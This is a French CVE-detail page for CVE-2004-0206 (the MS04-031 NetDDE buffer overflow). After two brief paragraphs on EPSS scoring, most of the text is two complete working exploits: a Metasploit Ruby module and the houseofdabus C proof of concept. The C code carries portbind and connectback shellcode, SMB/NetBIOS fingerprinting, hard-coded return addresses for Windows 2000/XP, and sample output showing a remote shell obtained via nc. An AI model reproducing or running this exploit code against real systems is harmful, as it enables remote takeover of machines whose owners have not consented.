CVE-2004-0206 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # $Id: ms04_031_netdde.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft NetDDE Service Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the NetDDE service, which is the precursor to the DCOM interface. This exploit effects only operating systems released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim that this vulnerability can be exploited without authentication, the NDDEAPI pipe is only accessible after successful authentication. }, 'Author' => [ 'pusscat' ], 'License' => BSD_LICENSE, 'Version' => '$Revision: 9669 $', 'References' => [ [ 'CVE', '2004-0206'], [ 'OSVDB', '10689'], [ 'BID', '11372'], [ 'MSB', 'MS04-031'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Payload' => { 'Space' => (0x600 - (133*4) - 4), 'BadChars' => "\\/.:$\x00", # \ / . : $ NULL 'Prepend' => 'A' * 8, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 SP4', { 'Ret' => 0x77e56f43 } ], # push esp, ret :) ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 12 2004')) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (nddeapi)", 'nddeapi']), ], self.class) end def exploit connect() smb_login() print_status("Trying target #{target.name}...") handle = dcerpc_handle('2f5f3220-c126-1076-b549-074d078619da', '1.2', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]) print_status("Binding to #{handle}") dcerpc_bind(handle) print_status("Bound to #{handle}") retOverWrite = 'AA' + (NDR.long(target.ret) * 133) + payload.encoded overflowChunk = retOverWrite + NDR.long(0xCA7CA7) + # Mew. 3 bytes enter. 1 byte null. NDR.long(0x0) stubdata = NDR.UnicodeConformantVaryingStringPreBuilt(overflowChunk) + NDR.long(rand(0xFFFFFFFF)) print_status('Calling the vulnerable function...') begin response = dcerpc.call(0xc, stubdata) rescue Rex::Proto::DCERPC::Exceptions::NoResponse end handler disconnect end end

/* HOD-ms04031-netdde-expl.c: 2004-12-30: PUBLIC v.0.2 * * Copyright (c) 2004 houseofdabus. * * (MS04-031) NetDDE buffer overflow vulnerability PoC * * * * * .::[ houseofdabus ]::. * * * * (special unstable version) * --------------------------------------------------------------------- * Description: * A remote code execution vulnerability exists in the NetDDE * services because of an unchecked buffer. An attacker who * successfully exploited this vulnerability could take complete * control of an affected system. However, the NetDDE services are * not started by default and would have to be manually started for * an attacker to attempt to remotely exploit this vulnerability. * This vulnerability could also be used to attempt to perform * a local elevation of privilege or remote denial of service. * * --------------------------------------------------------------------- * Patch: * http://www.microsoft.com/technet/security/Bulletin/MS04-031.mspx * * --------------------------------------------------------------------- * Tested on: * - Windows XP Professional SP0 * - Windows XP Professional SP1 * - Windows 2000 Professional SP2 * - Windows 2000 Professional SP3 * - Windows 2000 Professional SP4 * - Windows 2000 Advanced Server SP4 * * --------------------------------------------------------------------- * This is provided as proof-of-concept code only for educational * purposes and testing by authorized individuals with permission to * do so. * * --------------------------------------------------------------------- * Compile: * * Win32/VC++ : cl -o HOD-ms04031-expl HOD-ms04031-expl.c * Win32/cygwin: gcc -o HOD-ms04031-expl HOD-ms04031-expl.c -lws2_32.lib * Linux : gcc -o HOD-ms04031-expl HOD-ms04031-expl.c -Wall * * --------------------------------------------------------------------- * Command Line Parameters/Arguments: * * HOD-ms04031-expl.exe <host> <netbios name> <target> <bindport> * [connectback IP] [options] * * Targets: * 0 [0x00abfafc]: WinXP [universal] * 1 [0x009efb40]: Win2K [universal] * * Options: * -f: Netbios name fingerprinting * * --------------------------------------------------------------------- * Example: * * C:\>HOD-ms04031-expl.exe 192.168.0.1 -f * [*] Connecting to 192.168.0.1:139 ... OK * [*] Fingerprinting... OK * [+] Remote netbios name: HOD * * C:\> * C:\>HOD-ms04031-expl.exe 192.168.0.1 HOD 1 7878 * [*] Connecting to 192.168.0.1:139 ... OK * [*] Attacking 192.168.0.1 ...OK. * * C:\>nc 192.168.0.1 7878 * * Microsoft Windows 2000 [Version 5.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\WINNT\system32> * * --------------------------------------------------------------------- */ /* #define _WIN32 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #ifdef _WIN32 #include <winsock2.h> #pragma comment(lib, "ws2_32") #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #endif /* targets table */ struct targets { int num; char name[50]; long jmpaddr; } target[]= { { 0, "WinXP [universal] ", 0x00abfb1c - 0x20 }, { 1, "Win2K [universal] ", 0x009efb60 - 0x20 } }; /* portbind shellcode */ unsigned char portbindsc[] = "\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c" "\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b" "\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78" "\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b" "\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03" "\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b" "\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c" "\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4" "\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3" "\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70" "\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6" "\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e" "\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83" "\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32" "\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59" "\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50" "\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50" "\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14" "\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc" "\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c" "\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33" "\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44" "\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d" "\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50" "\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55" "\x28\xff\x55\x0c"; /* connectback shellcode */ unsigned char connectbacksc[] = "\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c" "\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b" "\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78" "\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b" "\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03" "\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b" "\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c" "\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4" "\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3" "\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa" "\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02" "\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83" "\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83" "\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc" "\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8" "\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90" "\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50" "\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8" "\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56" "\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa" "\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab" "\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50" "\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff" "\x77\x38\xff\x55\x20\xff\x55\x0c"; #define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300)) = (port) #define SET_CONNECTBACK_IP(buf, ip) *(unsigned long *)(((buf)+283)) = (ip) #define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290)) = (port) /* eax = target[].jmpaddr -> stack -> jmpcode -> shellcode 1. 0100D605 call dword ptr [eax+20h] 2. jmpcode 3. shellcode */ char jmpcode[] = "\x90\x90\x90\x90\x66\x81\xC7\x20\x03\xFF\xE7\x90\x90\x90\x90\x90" "\x50\x6f\x43\x20\x66\x6f\x72\x20\x4e\x65\x74\x44\x44\x45\x20\x28" "\x4d\x53\x30\x34\x2d\x30\x33\x31\x29\x2e\x20\x43\x6f\x70\x79\x72" "\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30\x30\x34\x2d\x32\x30" "\x30\x35\x20\x68\x6f\x75\x73\x65\x6f\x66\x64\x61\x62\x75\x73\x2e" "\xBB\xBB\xBB\xBB" /* => eax */ "PADPAD"; char smb_sesreq[] = "\x81\x00\x00\x44\x20\x43\x4b\x46\x44\x45\x4e\x45\x43\x46\x44\x45" "\x46\x46\x43\x46\x47\x45\x46\x46\x43\x43\x41\x43\x41\x43\x41\x43" "\x41\x43\x41\x43\x41\x00\x20\x45\x4b\x45\x44\x46\x45\x45\x49\x45" "\x44\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43" "\x41\x43\x41\x43\x41\x41\x41\x00"; char smb_negotiate[] = "\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5c\x02" "\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e" "\x31\x32\x00"; char d1[] = "\x0d\x12\x0b\x06\x0d\x18\x1c\x01\x10\x03\x12\x08\x1d\x1f\x0a\x0a" "\x16\x02\x17\x0e\x1b\x0d"; char req1[] = "\x81\x00\x00\x44"; char req2[] = "CACACACACACACACACACACACACACACABP"; char h1[] = "\x45\x44\x44\x4E\x00\x00\x00"; char h2[] = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; char h3[] = "\x00\x00\x02\x02\x00\x00\x00\x01\x00\x00\x00"; unsigned long ndlen = 0; unsigned long ntarget = 0; unsigned long backip = 0; unsigned short bindport = 0; unsigned long fixx(unsigned char *data, unsigned long i) { unsigned long len; len = (data[i+3]<<24) + (data[i+2]<<16) + (data[i+1]<<8) + (data[i]); return len; } unsigned long chksum(unsigned char *data, unsigned long dlen) { unsigned long i, len; unsigned long chk; chk = 0xFFFFFFFF; len = dlen - 4; for (i=0; i<len; i+=4) chk += fixx(data, i); while (i < dlen) { chk += (unsigned char)data[i]; i++; } return chk; } char * netbios_encode(char *ndata, char service) { char *tmpdata, *data, *nret; unsigned long dlen; char odiv, omod, o; int i; data = (char *)calloc(17, 1); memcpy(data, ndata, strlen(ndata)); dlen = strlen(data); while (dlen < 15) { strcat(data, "\x20"); dlen++; } memcpy(data+strlen(data), &service, 1); nret = (char *)calloc(strlen(data)*2+1, 1); tmpdata = nret; for (i=0; i<16; i++) { o = (char)data[i]; odiv = o / 16; odiv = odiv + 0x41; omod = o % 16; omod = omod + 0x41; *tmpdata++ = odiv; *tmpdata++ = omod; } free(data); return nret; } unsigned char * find_smbname(unsigned char *data, unsigned long len) { unsigned char *ptr; unsigned long i = 0; ptr = data; ptr += 91; while (i <= len - 3) { if (ptr[i] == '\x00') if (ptr[i+1] == '\x00') if (ptr[i+2] == '\x00') return ptr+i+3; i++; } return NULL; } /* fingerprinting */ unsigned char * smb_get_name(char *ip) { int sock, r; unsigned long smbname_len; unsigned char *name = NULL, *smbname; struct sockaddr_in s; struct hostent *he; unsigned char buf[256]; if ((he = gethostbyname(ip)) == NULL) { printf("[-] Unable to resolve %s\n", ip); return NULL; } sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock < 0) return NULL; s.sin_family = AF_INET; s.sin_addr = *((struct in_addr *)he->h_addr); s.sin_port = htons(139); memset(&(s.sin_zero), '\0', 8); memset(buf, 0, 256); printf("[*] Connecting to %s:139 ... ", ip); r = connect(sock, (struct sockaddr *) &s, sizeof(struct sockaddr_in)); if (r == 0) { printf("OK\n[*] Fingerprinting... "); /* sending session request */ send(sock, smb_sesreq, sizeof(smb_sesreq)-1, 0); Sleep(1000); r = recv(sock, (char *)buf, 256, 0); if (r < 0) goto err; memset(buf, 0, 256); /* sending negotiation request */ send(sock, smb_negotiate, sizeof(smb_negotiate)-1, 0); Sleep(1000); r = recv(sock, (char *)buf, 256, 0); if (r < 0) goto err; printf("OK\n"); smbname = find_smbname(buf, r); if (smbname == NULL) goto err; smbname_len = smbname - buf; name = (unsigned char *)calloc(smbname_len, 1); /* decoding */ r = 0; while (smbname_len) { if (*smbname != '\x00') { name[r] = *smbname; r++; } smbname++; smbname_len--; } } else { printf("failed\n[-] Can't connect to %s:139\n", ip); } err: shutdown(sock, 1); closesocket(sock); return name; } /* NetDDE packet */ char * packet_assembly(char *name, char *host) { char *main, *header, *data; char *lname, *rhost; unsigned long llen, rlen, len, hlen, dlen, csum, i; unsigned char name_hi, name_low, rhost_hi, rhost_low; unsigned char hod_hi, hod_low, len_hi, len_low; unsigned char nops[] = "\x90\x90\x90\x90"; /* nops */ char hod[] = "HOD-HOD\x01"; char hmain[] = "\x01\x00\xBE\x05\x0A\x00\x00"; char tmp[8]; llen = strlen(name) + 4; rlen = strlen(host); lname = (char *)calloc(llen + 3, 1); rhost = (char *)calloc(rlen + 3, 1); memcpy(lname, name, llen); strcpy(rhost, host); memcpy(lname + llen, "\x01", 1); strcat(rhost, "\x01"); name_hi = (unsigned char) ((llen+1) / 256); name_low = (unsigned char) ((llen+1) % 256); rhost_hi = (unsigned char) ((rlen + llen + 2) / 256); rhost_low = (unsigned char) ((rlen + llen + 2) % 256); len = sizeof(hod) - 1; hod_hi = (unsigned char) (len / 256); hod_low = (unsigned char) (len % 256); main = (char *)calloc( sizeof(hod)-1 + sizeof(hmain)-1 + llen + rlen + 11, 1 ); memcpy(main, hmain, sizeof(hmain)-1); sprintf(tmp, "%c%c%c%c%c%c", name_hi, name_low, rhost_hi, rhost_low, hod_hi, hod_low); memcpy(main+sizeof(hmain)-1, tmp, 6); memcpy(main+sizeof(hmain)-1+6, "\x00", 1); memcpy(main+sizeof(hmain)-1+7, lname, llen+1); memcpy(main+sizeof(hmain)-1+7+llen+1, rhost, rlen+1); memcpy(main+sizeof(hmain)-1+7+llen+1+rlen+1, hod, sizeof(hod)-1); memcpy(main+sizeof(hmain)-1+7+llen+1+rlen+1+sizeof(hod)-1, "\x2e", 1); len = sizeof(hmain)-1+7+llen+1+rlen+1+sizeof(hod)-1+1; len_hi = (unsigned char) (len / 256); len_low = (unsigned char) (len % 256); /* header */ header = (char *)calloc(sizeof(h1)-1 + sizeof(h2)-1 + sizeof(h3)-1 + 9, 1); memcpy(header, h1, sizeof(h1)-1); sprintf(tmp, "%c%c", len_hi, len_low); memcpy(header+sizeof(h1)-1, tmp, 2); memcpy(header+sizeof(h1)-1+2, h2, sizeof(h2)-1); memcpy(header+sizeof(h1)-1+2+sizeof(h2)-1, tmp, 2); memcpy(header+sizeof(h1)-1+2+sizeof(h2)-1+2, h3, sizeof(h3)-1); csum = chksum(main, len); memcpy(header+sizeof(h1)-1+sizeof(h2)-1+4 + sizeof(h3)-1, &csum, 4); /* data */ hlen = sizeof(h1)-1 + sizeof(h2)-1 + sizeof(h3)-1 + 8; data = (char *)calloc( sizeof(d1)-1 + len+hlen + 37 + 1200, 1 ); csum = chksum(header, hlen); memcpy(data+4, &csum, 4); memcpy(data+4+4, header, hlen); memcpy(data+4+4+hlen, main, len); memcpy(data+4+4+hlen+len, d1, sizeof(d1)-1); /* nops */ for (i=0; i<154; i++) memcpy(data+4+4+hlen+len+sizeof(d1)-1 + i*4, nops, 4); /* shellcode */ if (!backip) { /* portbind */ SET_PORTBIND_PORT(portbindsc, htons(bindport)); memcpy(data+4+4+hlen+len+sizeof(d1)-1+154*4, portbindsc, sizeof(portbindsc)-1); dlen = 4+hlen+len+sizeof(d1)-1+sizeof(portbindsc)-1+154*4; } else { /* connectback */ SET_CONNECTBACK_IP(connectbacksc, backip); SET_CONNECTBACK_PORT(connectbacksc, htons(bindport)); memcpy(data+4+4+hlen+len+sizeof(d1)-1+154*4, connectbacksc, sizeof(connectbacksc)-1); dlen = 4+hlen+len+sizeof(d1)-1+sizeof(connectbacksc)-1+154*4; } ndlen = dlen + 4; dlen = htonl(dlen); memcpy(data, &dlen, 4); free(lname); free(rhost); free(main); free(header); return data; } void usage(char *prog) { int i; printf("%s <host> <netbios name> <target> <bindport> [connectback IP] [options]\n\n", prog); printf("Targets:\n"); for (i = 0; i < 2; i++) printf(" %d [0x%.8x]: %s\n", target[i].num, target[i].jmpaddr, target[i].name); printf("\nOptions:\n\t-f: Netbios name fingerprinting\n"); exit(0); } void vargs(int argc, char **argv) { int i, finger = 0; char *nname = NULL; for (i = 2; i < argc; i++) { if (argv[i][0] == '-') { if (argv[i][1] == 'f') finger = 1; } } if (finger && argc > 2) { nname = smb_get_name(argv[1]); if (nname) { printf("[+] Remote netbios name: %s\n", nname); free(nname); } exit(0); } else if (argc < 5) usage(argv[0]); if ((ntarget = atoi(argv[3])) > 1) usage(argv[0]); bindport = (unsigned short)atoi(argv[4]); if (argc > 5) backip = inet_addr(argv[5]); return; } int main (int argc, char **argv) { int len, sockfd; char *host; char *req; struct hostent *he; struct sockaddr_in their_addr; char rbuf[4096]; #ifdef _WIN32 WSADATA wsa; #endif char *ses_req; char *data, *hname; char *hn, *hn2; unsigned long req_sz, hname_len, hn_len; #ifdef _WIN32 WSAStartup(MAKEWORD(2,0), &wsa); #endif printf("\n (MS04-031) NetDDE buffer overflow vulnerability PoC\n\n"); printf("\tCopyright (c) 2004-2005 .::[ houseofdabus ]::.\n\n\n"); vargs(argc, argv); hn = argv[2]; /* target netbios name */ host = argv[1]; /* target host name */ if (strlen(host) > 1024) return 0; /* target jmpaddr */ memcpy(jmpcode+80, &target[ntarget].jmpaddr, 4); ses_req = (char *)calloc(sizeof(req1)-1 + sizeof(req2)-1 + 114, 1); memcpy(ses_req, req1, sizeof(req1)-1); memcpy(ses_req+sizeof(req1)-1, "\x20", 1); hname = netbios_encode(hn, 0x1F); hname_len = strlen(hname); memcpy(ses_req+sizeof(req1)-1+1, hname, hname_len); memcpy(ses_req+sizeof(req1)-1+1+hname_len, "\x00\x20", 2); memcpy(ses_req+sizeof(req1)-1+1+hname_len+2, req2, sizeof(req2)-1); memcpy(ses_req+sizeof(req1)-1+1+hname_len+2+sizeof(req2)-1, "\x00", 1); req_sz = sizeof(req1)-1+sizeof(req2)-1+hname_len+4; if ((he = gethostbyname(host)) == NULL) { printf("[-] Unable to resolve %s\n", host); return 0; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("[-] Error: socket failed\n"); return 0; } req = req1; their_addr.sin_family = AF_INET; their_addr.sin_port = htons(139); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(their_addr.sin_zero), '\0', 8); /* connecting */ printf("[*] Connecting to %s:139 ... ", host); if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) < 0) { printf("[-] Error: connect failed\n"); return 0; } printf("OK\n"); if (send(sockfd, ses_req, req_sz, 0) < 0) { printf("[-] Error: send failed\n"); return 0; } len = recv(sockfd, rbuf, 4096, 0); if (len < 0) return 0; /* check NetDDE */ if ((unsigned char)rbuf[0] != 0x82) { printf("[-] NetDDE disabled or wrong netbios name\n"); return 0; } hn2 = (char *)calloc(16, 1); memcpy(hn2, hn, strlen(hn)); hn_len = strlen(hn); while (hn_len < 15) { strcat(hn2, "\x20"); hn_len++; } /* attacking */ printf("[*] Attacking %s ...", host); data = packet_assembly(jmpcode, hn2); if (send(sockfd, data, ndlen, 0) < 0) { printf("\n[-] Error: send failed\n"); return 0; } printf("OK.\n"); len = recv(sockfd, rbuf, 4096, 0); shutdown(sockfd, 1); closesocket(sockfd); free(data); free(hn2); free(ses_req); free(hname); return 0; } // milw0rm.com [2004-12-31]